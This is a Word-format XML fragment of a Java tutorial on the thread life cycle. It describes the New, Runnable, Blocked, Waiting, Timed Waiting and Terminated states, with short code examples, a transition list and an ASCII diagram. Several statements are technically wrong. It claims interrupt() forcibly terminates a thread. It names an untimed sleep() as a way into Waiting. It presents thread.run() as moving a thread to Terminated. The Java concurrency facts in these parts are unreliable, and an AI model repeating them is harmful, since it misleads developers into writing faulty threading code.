    <w:p w14:paraId="025CEB21" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>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New (Born) State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B4FDF2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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When a thread is created using the Thread class but hasn't started yet, it is in the "New" state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F0628" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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This is the initial state when a thread object is instantiated but the start() method has not been called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C03D3"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Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB8095"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Thread thread = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A10A02F"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 The thread is in the "New" state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADDEC90" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>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Runnable State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC920B5" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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After calling the start() method on the thread, it enters the "Runnable" state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8BC23" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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In this state, the thread is ready to run, but it might not be executing immediately because the CPU scheduler might not have allocated CPU time to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45565245" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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A thread is considered "Runnable" when it's either in the ready-to-run queue or actively executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F0CD1"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Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBB690B"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Thread thread = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B9B0E7"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thread.start(); // The thread is now in the "Runnable" state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C44297" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>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Blocked (Waiting) State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B8F4B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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lastRenderedPageBreak/>
        <w:t>A thread enters the "Blocked" state when it wants to access a synchronized block or method but cannot because another thread is holding the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F5146D" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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The thread will remain blocked until the lock is released by the other thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D6DD2"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Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0ACB0F"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synchronized (someObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021CDA04"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 xml:space="preserve">    // The thread may be blocked here if another thread is holding the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E47D95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B28478" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>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Waiting State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729090B6" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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A thread enters the "Waiting" state when it is waiting indefinitely for another thread to perform a particular action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C7AE6" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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This state is usually achieved by calling methods like wait(), join(), or sleep() with no timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD388DF"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Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A369925"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synchronized (someObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DFAE2"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 xml:space="preserve">    someObject.wait(); // The thread enters "Waiting" state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE6CCB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C908688" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>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Timed Waiting State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85E0A1" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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A thread is in the "Timed Waiting" state when it is waiting for a specified amount of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07566F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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The thread will remain in this state until the specified time has passed or it is interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8BA0E9" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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Examples of methods that put a thread in this state include sleep(millis), join(millis), wait(millis).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8FA83"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Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F54B3"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thread.sleep(1000); // The thread is in the "Timed Waiting" state for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05811A18" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>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Terminated (Dead) State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2ADA3" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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A thread enters the "Terminated" state when it has finished its execution or when it is forcibly terminated by calling interrupt().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615C126A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>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Once a thread reaches this state, it cannot be started again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B624C"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Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536C5C5"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thread.run(); // After execution completes, the thread reaches "Terminated" state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714DC6F8" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Life Cycle Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6FEF8" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>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New</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is created but not yet started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06005912" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>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Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is ready to run and waiting for CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665CD5F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>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Blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is blocked, waiting for a lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A849A71" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>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Waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is waiting indefinitely for a specific condition or action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C25AE39" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>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Timed Waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is waiting for a specified period (e.g., sleep(), join() with timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C99C45A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>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Terminated</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread finishes its execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320EB672" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread State Transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7979EFBA" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>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New → Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread enters the runnable state when the start() method is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EEBB3D" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>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Runnable → Blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread can transition to the blocked state when it tries to access a synchronized block or method that another thread is holding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291F8FD" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>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Blocked → Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the lock is released, the thread can move back to the runnable state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509D5FA" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>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Runnable → Waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread enters the waiting state when it calls methods like wait() or join().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562D062" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>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Waiting → Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread moves back to the runnable state when it is notified or when the specified wait time expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0FD1F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>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Runnable → Timed Waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the thread calls methods like sleep() or join() with a timeout, it enters the timed waiting state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745B469B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>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Timed Waiting → Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After the timeout expires or the thread is notified, it returns to the runnable state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB098EC" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>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Runnable → Terminated</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread reaches the terminated state when it finishes its execution or if it is interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE7963C" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Diagram of Thread Life Cycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B696B"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 xml:space="preserve">       +-------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187FDBF"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 xml:space="preserve">       |       New         |  &lt;-- Thread created but not started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E53FE"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 xml:space="preserve">       +-------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88F551"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 xml:space="preserve">               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037E731"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 xml:space="preserve">               v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BACF035"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 xml:space="preserve">       +-------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4487FDF1"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 xml:space="preserve">       |     Runnable      |  &lt;-- Thread is ready to run but may not be executing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025D47A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">       +-------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36552290"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 xml:space="preserve">         |             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BCAC5"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 xml:space="preserve">         v             v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743EED50"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 xml:space="preserve">       +---------+     +---------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D22F8BF"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 xml:space="preserve">       | Blocked |     | Waiting |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD7368"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 xml:space="preserve">       +---------+     +---------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66312336"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 xml:space="preserve">         |             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620C4EF"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 xml:space="preserve">         v             v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FB108"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 xml:space="preserve">       +---------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA76030"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 xml:space="preserve">       |    Terminated        |  &lt;-- Thread finishes execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221FAF0"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 xml:space="preserve">       +---------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA4996F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F25C5" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>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New State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread is just created but hasn’t started yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4178C65E" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>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Runnable State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread is in the ready-to-run queue, waiting for CPU allocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515EC8C8" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>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Blocked State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread is blocked and waiting for a lock on a synchronized resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49892F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>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Waiting State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread is waiting indefinitely for another thread to notify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C209275" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>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Timed Waiting State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread waits for a specified time before resuming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F9029" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Terminated State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread has completed its execution.</w:t>
      </w:r>
